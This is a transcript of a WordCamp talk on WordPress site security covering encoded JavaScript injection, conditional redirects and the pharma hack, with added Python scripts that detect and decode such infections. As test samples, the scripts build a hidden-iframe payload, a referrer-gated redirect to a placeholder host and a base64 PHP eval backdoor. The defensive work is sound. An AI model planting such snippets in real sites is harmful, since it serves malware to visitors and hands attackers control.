why my website sells viagra

Post on 29-Jan-2015


DESCRIPTION

WordPress End-User Security - WordCamp Atlanta - Dre Armeda, CISSP

TRANSCRIPT

DRE ARMEDA, CISSP

@DREMEDA


CO-FOUNDER AT SUCURI SECURITY
ORGANIZER, WORDCAMP SAN DIEGO
12 YEAR NAVY VETERAN
1ST WORDPRESS THEME IN 2005
LOVES TACOS
DIEHARD CHARGERS FAN
RIDES A HARLEY

SUCURI.NET / DRE.IM


THE WEB IS GROWING


Over 2 Billion internet users today. 480% growth in the last 11 years. (Internet World Stats)

300 million websites were added to the internet in 2011 (Pingdom)

100,000+ domains gained weekly (Global Domain Registry)

INNOVATION & CREATIVITY


IT'S NOT ALL PEACHY

WHAT IS MALWARE?

Malware, short for malicious software, is software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.

SEO spam, JavaScript and iFrame injections, and malicious redirects are a few examples of web-based malware.

ATTACKERS LOVE YOU

Monitor your web browsing and internet usage
Forced advertising
Redirect affiliate marketing revenue

HOW BAD IS IT?


Over 2 million new malware strings monthly (McAfee)

Cost to US consumers alone = over $2.3 billion in 2010. (Consumer Reports)

Google Safe Browsing issues over 3 million malware warnings a day. (Google)


ENCODED JAVASCRIPT

Impact: Website pages may be used to serve malicious downloads to visitors. Those downloads may be used to infect desktop computers and/or steal FTP credentials.

Typical Entry Point: Outdated, known vulnerable software; exploited desktop computers; stolen FTP credentials.

JavaScript that is obfuscated (hidden) so that you can't tell what it does. It is injected into files/pages on the site and used to serve malware.

ENCODED JAVASCRIPT

/wp-admin/js/cat.js – CLEAN

ENCODED JAVASCRIPT

/wp-admin/js/cat.js – INFECTED

ENCODED JAVASCRIPT

/wp-admin/js/cat.js – INFECTION DECODED (somewhat)

ENCODED JAVASCRIPT

How it works:

1. Attacker scans for known vulnerable software (old WordPress installations, plugins, themes). The attack can also stem from a compromised desktop computer that leaks stored FTP credentials.

2. A backdoor file is inserted into the environment. This gives the attacker remote access into your world.

3. The payload is inserted into various JavaScript files and/or encoded and hidden in theme and plugin files.

4. You've just enabled your visitors to load fake anti-virus and other "cool" downloads from your site.
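As an added example (this is not code from the talk or from Sucuri), the following Python script does what the cat.js CLEAN / INFECTED / DECODED slides illustrate: it finds the eval(unescape(...)) and eval(String.fromCharCode(...)) wrappers that attackers append to legitimate .js files and decodes the payload statically, without ever executing it. The clean script, the injected payload and the host example.invalid are all constructed for this example; they do not reproduce the screenshots from the deck.

```python
"""Added example (not from the original slides or Sucuri): detect and
statically decode an obfuscated JavaScript injection in a .js file."""
import re

# Constructed sample of a legitimate theme script (stands in for a clean cat.js).
CLEAN_JS = (
    "jQuery(function($){\n"
    "  $('#cat').on('change', function(){ window.location = this.value; });\n"
    "});\n"
)

# Constructed payload the attacker wants every visitor to run: a 1x1 hidden
# iframe pulling an exploit page.  example.invalid is a reserved placeholder.
PAYLOAD = ("document.write('<iframe src=\"http://example.invalid/in.php\" "
           "width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>');")

# Two common wrappers seen in the wild, appended after the legitimate code.
INFECTED_FROMCHARCODE = CLEAN_JS + "eval(String.fromCharCode(%s));\n" % ",".join(
    str(ord(c)) for c in PAYLOAD)
INFECTED_UNESCAPE = CLEAN_JS + 'eval(unescape("%s"));\n' % "".join(
    "%%%02X" % ord(c) for c in PAYLOAD)

# Signature: eval() wrapped around a runtime decoder is the tell, not the
# decoder itself (minifiers emit String.fromCharCode legitimately).
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*(unescape|String\.fromCharCode)\s*\((.*?)\)\s*\)", re.S)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_fromcharcode(arg_list):
    """'100,111,99' -> 'doc' (the numeric argument list of String.fromCharCode)."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", arg_list))


def decode_unescape(literal):
    """'%64%6F%63' -> 'doc' (the string literal handed to unescape())."""
    return re.sub(r"%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), literal.strip("'\" "))


def scan_js(source):
    """Describe the first injected eval wrapper in a script, if any.

    The payload is recovered with plain string operations; nothing is evaluated,
    so it is safe to run over a quarantined copy of an infected file.
    """
    m = WRAPPER_RE.search(source)
    if not m:
        return {"infected": False, "payload": None, "urls": []}
    decoder, inner = m.group(1), m.group(2)
    payload = (decode_fromcharcode(inner) if decoder == "String.fromCharCode"
               else decode_unescape(inner))
    return {"infected": True,
            "offset": m.start(),          # where the injection starts in the file
            "decoder": decoder,
            "payload": payload,
            "urls": URL_RE.findall(payload)}   # hosts to block / report


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_JS),
                        ("fromCharCode", INFECTED_FROMCHARCODE),
                        ("unescape", INFECTED_UNESCAPE)):
        print(label, scan_js(text))
```

Run it over a copy of the suspect file and compare the offset against the file's length: an injection that begins exactly where the legitimate code ends (as here) is the usual pattern, because the attacker appends rather than rewrites. Real samples often nest several layers (the decoded payload is itself another eval), so loop scan_js over its own payload until it returns clean.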

CONDITIONAL REDIRECTS

Impact: When traffic arrives from a specific referrer (e.g. Google, Bing), the visitor is redirected to a malicious website.

Typical Entry Point: Outdated, known vulnerable software.

An attack that causes a website to redirect visitors to a malicious website based on referrer, web browser, or operating system.

CONDITIONAL REDIRECTS

Infected .htaccess file:

CONDITIONAL REDIRECTS

Result of conditional redirect:

CONDITIONAL REDIRECTS

How it works:

1. Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).

2. A backdoor file is inserted into the environment. This gives the attacker remote access into your world.

3. .htaccess entries are created to perform the redirect. Encoded redirect code can also be added to index files.

4. You're now redirecting visitors to some cool malware awesomeness.
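The infected .htaccess shown on the slide is a screenshot and is not in this transcript, so the block below uses a constructed one. It is an added example, not the speaker's or Sucuri's code: it groups each RewriteRule with its RewriteCond lines and flags any rule that sends traffic to a host other than your own while being gated on the referrer, user agent or client address, which is exactly the shape of a conditional redirect. The site host mysite.example and the attacker host example.invalid are placeholders.

```python
"""Added example (not from the original slides or Sucuri): find referrer- or
user-agent-conditional redirects to foreign hosts in an .htaccess file."""
import re

# Constructed: the stock WordPress rewrite block a clean site ships with.
CLEAN_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Constructed: the same file with an injected block.  Visitors arriving from a
# search engine are bounced to the attacker's host; the owner, who types the URL
# directly, never sees it.  example.invalid is a reserved placeholder host.
INFECTED_HTACCESS = CLEAN_HTACCESS + """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]
RewriteRule ^(.*)$ http://example.invalid/go.php?q=$1 [R=301,L]
"""

# Request variables an attacker keys a conditional redirect on.
TRIGGER_VARS = {"%{HTTP_REFERER}", "%{HTTP_USER_AGENT}", "%{REMOTE_ADDR}"}


def parse_rewrite_groups(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    groups, pending = [], []
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append({"var": parts[1], "pattern": parts[2],
                            "flags": parts[3] if len(parts) > 3 else ""})
        elif directive == "rewriterule" and len(parts) >= 3:
            groups.append({"conds": pending, "pattern": parts[1],
                           "target": parts[2],
                           "flags": parts[3] if len(parts) > 3 else ""})
            pending = []
    return groups


def find_conditional_redirects(text, own_hosts):
    """Flag rules that send traffic off-site and are gated on referrer/UA/IP."""
    findings = []
    for g in parse_rewrite_groups(text):
        m = re.match(r"https?://([^/?#]+)", g["target"], re.I)
        if not m or m.group(1).lower() in own_hosts:
            continue                     # relative rewrite or redirect to ourselves
        triggers = sorted({c["var"].upper() for c in g["conds"]} & TRIGGER_VARS)
        if triggers:
            findings.append({"target_host": m.group(1),
                             "triggers": triggers,
                             "patterns": [c["pattern"] for c in g["conds"]],
                             "flags": g["flags"]})
    return findings


if __name__ == "__main__":
    print(find_conditional_redirects(CLEAN_HTACCESS, {"mysite.example"}))
    print(find_conditional_redirects(INFECTED_HTACCESS, {"mysite.example"}))
```

To confirm a redirect from the outside, request the page once with a search-engine referrer and once without, e.g. `curl -sI -e 'https://www.google.com/' http://mysite.example/` versus `curl -sI http://mysite.example/`, and compare the status line and Location header. Do it from a network the attacker cannot have whitelisted (they often exclude the owner's IP), and remember that a clean .htaccess does not clear the site: the same logic is frequently hidden as encoded PHP in index.php.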

PHARMA HACK

Impact: Website page and post titles, descriptions and links are changed so that search engine result pages display pharmaceutical ads and links back to malicious websites.

Typical Entry Point: Outdated, known vulnerable software.

Pharma Hack is a type of SEO poisoning. Attackers manipulate search engine results so that their links rank above legitimate results.

PHARMA HACK

Results of scanning rendered source:

PHARMA HACK

Google Search Engine Results:

PHARMA HACK

How it works:

1. Attacker scans for known vulnerable software (old WordPress installations, plugins, themes).

2. A backdoor file is inserted into the environment. This gives the attacker remote access into your world.

3. A control file is inserted into core application or plugin files. This file acts as the connection from the backdoor to the database.

4. The payload is dropped into the database and Viva Viagra!

QUICK TIP: Check Google to see if you're infected - site:{yourdomain.com} viagra
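Two checks follow from steps 3 and 4 and from the "rendered source" slide: look in the database for the dropped payload, and look at the page the way a search engine sees it. The Python below is an added example, not the talk's or Sucuri's code. The wp_options rows are constructed to resemble the base64-encoded entries under innocuous option names that the pharma write-ups describe (the names here are illustrative, not a list of known indicators), and the two HTML responses stand in for fetching the same URL as a browser and as a crawler.

```python
"""Added example (not from the original slides or Sucuri): look for a pharma
hack payload in wp_options and for search-engine cloaking in rendered pages."""
import base64
import re

PHARMA_RE = re.compile(r"\b(viagra|cialis|levitra|pharmacy)\b", re.I)
PHP_CODE_RE = re.compile(
    r"<\?php|\beval\s*\(|base64_decode\s*\(|gzinflate\s*\(", re.I)
B64_RE = re.compile(r"^[A-Za-z0-9+/\s]{40,}={0,2}$")


def _b64(s):
    """Helper used only to build the constructed sample rows."""
    return base64.b64encode(s.encode()).decode()


# Constructed wp_options rows (option_name, option_value).  The last two mimic
# the pattern of the pharma hack: a PHP control snippet and spam HTML, both
# base64-encoded under harmless-looking names.  Names are illustrative.
OPTIONS = [
    ("siteurl", "https://mysite.example"),
    ("blogname", "My Site"),
    ("active_plugins", 'a:1:{i:0;s:19:"akismet/akismet.php";}'),
    ("widget_generic_support",
     _b64("<?php if(isset($_GET['p'])){eval(base64_decode($_GET['p']));} ?>")),
    ("rss_7988ee9bf2fd0d8a5c1f",
     _b64('<a href="http://example.invalid/buy">Cheap Viagra Online</a>')),
]


def decode_value(value):
    """Return (text, was_base64); base64 blobs are decoded for inspection."""
    if B64_RE.match(value.strip()):
        try:
            return base64.b64decode(value.strip()).decode("utf-8", "replace"), True
        except ValueError:
            pass
    return value, False


def scan_options(rows):
    """Flag option rows whose (decoded) value carries PHP code or pharma spam."""
    findings = []
    for name, value in rows:
        text, encoded = decode_value(value)
        reasons = []
        if PHP_CODE_RE.search(text):
            reasons.append("php-code")       # executable code has no business here
        if PHARMA_RE.search(text):
            reasons.append("pharma-keyword")
        if reasons:
            findings.append({"option": name, "encoded": encoded,
                             "reasons": reasons, "preview": text[:60]})
    return findings


# Constructed responses for one URL: what a browser receives versus what a
# crawler identifying as Googlebot receives.  The spam is served only to the
# crawler, which is why the owner sees nothing wrong in their own browser.
HTML_BROWSER = ("<html><head><title>My Site</title></head>"
                "<body><h1>Welcome</h1></body></html>")
HTML_BOT = ('<html><head><title>Buy Viagra Online - My Site</title></head>'
            '<body><h1>Welcome</h1><div style="display:none">'
            '<a href="http://example.invalid/buy">cheap cialis</a></div>'
            '</body></html>')


def detect_cloaking(html_browser, html_bot):
    """Compare two fetches of one page; a different title or bot-only spam means cloaking."""
    def title(h):
        m = re.search(r"<title>(.*?)</title>", h, re.I | re.S)
        return m.group(1).strip() if m else ""
    spam_browser = len(PHARMA_RE.findall(html_browser))
    spam_bot = len(PHARMA_RE.findall(html_bot))
    return {"browser_title": title(html_browser),
            "bot_title": title(html_bot),
            "spam_terms_bot_only": spam_bot - spam_browser,
            "cloaked": title(html_browser) != title(html_bot) or spam_bot > spam_browser}


if __name__ == "__main__":
    for f in scan_options(OPTIONS):
        print(f)
    print(detect_cloaking(HTML_BROWSER, HTML_BOT))
```

For the database check, feed it `SELECT option_name, option_value FROM wp_options` from a dump; base64 alone is not proof (some plugins store images that way), which is why the flag is on decoded PHP or spam terms, not on encoding. For the cloaking check, fetch the page normally and again with `curl -A 'Googlebot/2.1' http://mysite.example/` and hand both bodies to detect_cloaking; together with the site: search in the quick tip, that is usually enough to tell whether you are selling Viagra without knowing it.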

PHARMA HACK

Pharma Hack Resources:

http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html

http://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html

http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php

http://wpdude.com/refreshing-google-index-after-pharma-hack

WHAT IS SECURITY?

PROTECTING THINGS OF VALUE FROM HARM’S WAY.

HOW & WHY

AM I SECURE?

The percentage of risk can never be 0!

The name of the game is minimizing risk.

LOCAL MACHINE

Ensure your local machine stays updated

Use an Anti-Virus solution & enable auto-updates
Mac – Sophos Anti-Virus for Mac Home Edition
Windows – AVG Anti-Virus Free

Don’t store server credentials on your local machine

CONNECT TO YOUR SITE

Consider using SFTP or SSH instead of FTP.

If you're stuck with FTP:

Deny anonymous login
Limit connections

Practice least privilege

Don’t store server credentials on your local machine

PASSWORDS

Change them often
Don't write them down, or share them

Passwords are like toothbrushes, you should keep them to yourself. And discard them, and get a new one, if they have been used by others.

Don’t use the same password across all your accounts

Use a password manager

KeePass Password Safe
LastPass
1Password

WHO HOSTS YOU?

CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!

DO YOUR RESEARCH!

What software are they running? How often do they update?

How are server and support credentials stored, and who has access? Are they one and the same?

What is their malware remediation process?
How many of their sites have been infected?

http://www.google.com/safebrowsing/diagnostic?site=google.com

GARAGE CLEANING

IF YOU’RE NOT USING IT, REMOVE IT!

UPDATE UPDATE UPDATE UPDATE UPDATE
Only load what's needed to get your job done.
Check your file and directory permissions.
Remove user accounts! – Practice least privilege.
Have you changed your password lately?
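"Check your file and directory permissions" is the one item on this checklist that is easy to do badly, so here is an added example (not from the talk or Sucuri) of what to look for. The script builds a throwaway, constructed WordPress-like tree with deliberate mistakes in a temporary directory, then audits it for the three things that matter most on shared hosting: anything world-writable, a wp-config.php that other users on the box can read, and PHP files sitting under wp-content/uploads, where a backdoor is most often dropped. The paths and modes are hypothetical; point audit_permissions at a real document root to use it.

```python
"""Added example (not from the original slides or Sucuri): audit a WordPress
tree for the permission problems the garage-cleaning checklist points at."""
import os
import shutil
import stat
import tempfile

UPLOADS = os.path.join("wp-content", "uploads")
PHP_EXT = (".php", ".phtml", ".php5", ".phar")


def audit_permissions(root):
    """Walk a site root and return sorted (relative_path, finding) tuples.

    world-writable        : any user on the host can plant or alter files
    world-readable-config : wp-config.php (DB credentials) readable by others
    php-in-uploads        : executable code where only media should live
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            if rel == "wp-config.php" and mode & stat.S_IROTH:
                findings.append((rel, "world-readable-config"))
            if rel.startswith(UPLOADS + os.sep) and name.lower().endswith(PHP_EXT):
                findings.append((rel, "php-in-uploads"))
    return sorted(findings)


def build_sample_site():
    """Constructed throwaway tree with deliberate mistakes (hypothetical layout)."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    files = {
        "index.php": 0o644,
        "wp-config.php": 0o644,                                  # readable by everyone
        os.path.join("wp-content", "themes", "demo", "style.css"): 0o644,
        os.path.join(UPLOADS, "2012", "03", "photo.jpg"): 0o666,   # world-writable
        os.path.join(UPLOADS, "2012", "03", ".cache.php"): 0o644,  # backdoor-shaped
    }
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)
    os.chmod(os.path.join(root, UPLOADS), 0o777)                 # world-writable dir
    return root


def run_demo():
    """Build the sample tree, audit it, remove it, and return the findings."""
    root = build_sample_site()
    try:
        return audit_permissions(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, what in run_demo():
        print("%-40s %s" % (rel, what))
```

The quick shell equivalent for the first check is `find /path/to/site -perm -0002`, but the script is worth keeping because the uploads check catches the backdoor that the permission bits alone will not, and because hosts that run PHP as your own user make "correct" 644/755 files still writable by anything that compromises the site.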

BACKUP YOUR WEBSITE

NO BACKUPS = BOOOOO!

BackupBuddy - http://pluginbuddy.com/backupbuddy/

VaultPress – http://vaultpress.com

MALWARE SCAN

IS YOUR SITE INFECTED?

Unmask Parasites – http://unmaskparasites.com
Sucuri SiteCheck – http://sitecheck.sucuri.net

MALWARE CLEAN UP

IS YOUR SITE INFECTED?

VaultPress – http://vaultpress.com
Sucuri Security – http://sucuri.net

WORDPRESS PLUGINS

WordPress Exploit Scanner
BulletProof Security
Login Lockdown
Sucuri SiteCheck Malware Scanner
